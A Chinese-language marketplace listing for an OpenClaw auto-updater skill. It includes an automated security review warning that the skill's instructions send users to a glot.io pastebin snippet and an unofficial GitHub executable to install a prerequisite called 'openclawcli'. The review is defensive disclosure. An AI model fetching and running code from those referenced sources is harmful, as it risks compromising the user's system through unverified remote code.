← 返回 Skills 市场
Update
作者
timclawbot
· GitHub ↗
· v1.0.0
1209
总下载
0
收藏
1
当前安装
1
版本数
在 OpenClaw 中安装
/install update
功能描述
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
安全使用建议
This skill appears to do what it says (schedule and run updates) but has two things you should verify before installing: (1) The SKILL.md expects you to install and run 'openclawcli' but the skill metadata does not declare that required binary — ask the publisher to add it to metadata. (2) The instructions point to a third-party GitHub release and a glot.io snippet for installing openclawcli; treat these as unverified installers. Do not run arbitrary downloaded executables without verifying the publisher and release integrity. If you proceed: review the exact cron command the skill will install, run clawdhub update --all --dry-run first, back up any critical skills/config, ensure you are comfortable granting the user running Clawdbot permission to update global packages, and prefer installing openclawcli from an official project release or your organization's vetted source. If you cannot validate the openclawcli source, consider performing updates manually instead.
功能分析
Type: OpenClaw Skill
Name: update
Version: 1.0.0
The skill's core functionality for auto-updating Clawdbot and other skills appears benign. However, the `SKILL.md` file contains highly insecure instructions for installing its `openclawcli` prerequisite. For macOS, it directs users to visit `glot.io/snippets/hfd3x9ueu5` and execute an installation command from this untrusted pastebin, which is a critical remote code execution (RCE) vulnerability. For Windows, it instructs downloading and running an executable from an arbitrary GitHub user (`Ddoy233/openclawcli`), posing a significant supply chain risk. These instructions, if followed by an AI agent or user, could lead to system compromise by executing arbitrary, potentially malicious, external code.
能力评估
Purpose & Capability
The SKILL.md describes exactly the expected behavior for an auto-updater (scheduling a cron job, running clawdbot/clawdhub update commands). However, the skill repeatedly requires the 'openclawcli' utility for operation but the registry metadata lists no required binaries or primary credential — an explicit prereq is missing from the declared requirements. That mismatch is an incoherence worth flagging.
Instruction Scope
Runtime instructions stay within the stated purpose: add a cron job, run clawdbot/clawdhub update, and report results. They reference system state (cron.enabled, Gateway running) and advise checking Task Manager / process state which is reasonable for a scheduler. The instructions do, however, point users to downloading/activating external tooling (openclawcli) and include global package-manager commands that will modify system-installed packages — operations that require elevated filesystem privileges and are therefore sensitive.
Install Mechanism
There is no formal install spec (instruction-only), which is low-risk in itself, but the SKILL.md tells users to download openclawcli from a third-party GitHub release (github.com/Ddoy233/...) and to run a snippet from glot.io. Those are not clearly official project hosts and could deliver arbitrary code; recommending these resources without verification is a high-risk practice.
Credentials
The skill declares no environment variables or credentials, which matches the low-declaration footprint. However, it performs privileged operations (global npm/pnpm/bun updates, writing to skill directories, creating cron jobs) that implicitly require filesystem write permissions or elevated privileges; this is proportionate to an updater but should be made explicit. Also, the missing declared dependency on openclawcli hides an important required binary/privilege.
Persistence & Privilege
The skill's persistent effect is to create a scheduled cron job that runs daily — this matches the updater purpose and 'always' is not set. It does introduce ongoing privileged activity (periodic updates that modify installed software), but that is within scope for an auto-updater and is not inherently an overreach in metadata or flags.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install update - 安装完成后,直接呼叫该 Skill 的名称或使用
/update触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.0
- Initial release of the auto-updater skill.
- Adds daily automatic updates for Clawdbot and all installed skills via a scheduled cron job.
- Sends a summary message to the user detailing updates and any issues encountered.
- Supports Windows, macOS, and Linux (requires openclawcli utility to be installed and running).
- Includes troubleshooting tips and manual command references for managing updates.
元数据
常见问题
Update 是什么?
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 1209 次。
如何安装 Update?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install update」即可一键安装,无需额外配置。
Update 是免费的吗?
是的,Update 完全免费(开源免费),可自由下载、安装和使用。
Update 支持哪些平台?
Update 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(windows, darwin, linux)。
谁开发了 Update?
由 timclawbot(@timclawbot)开发并维护,当前版本 v1.0.0。
推荐 Skills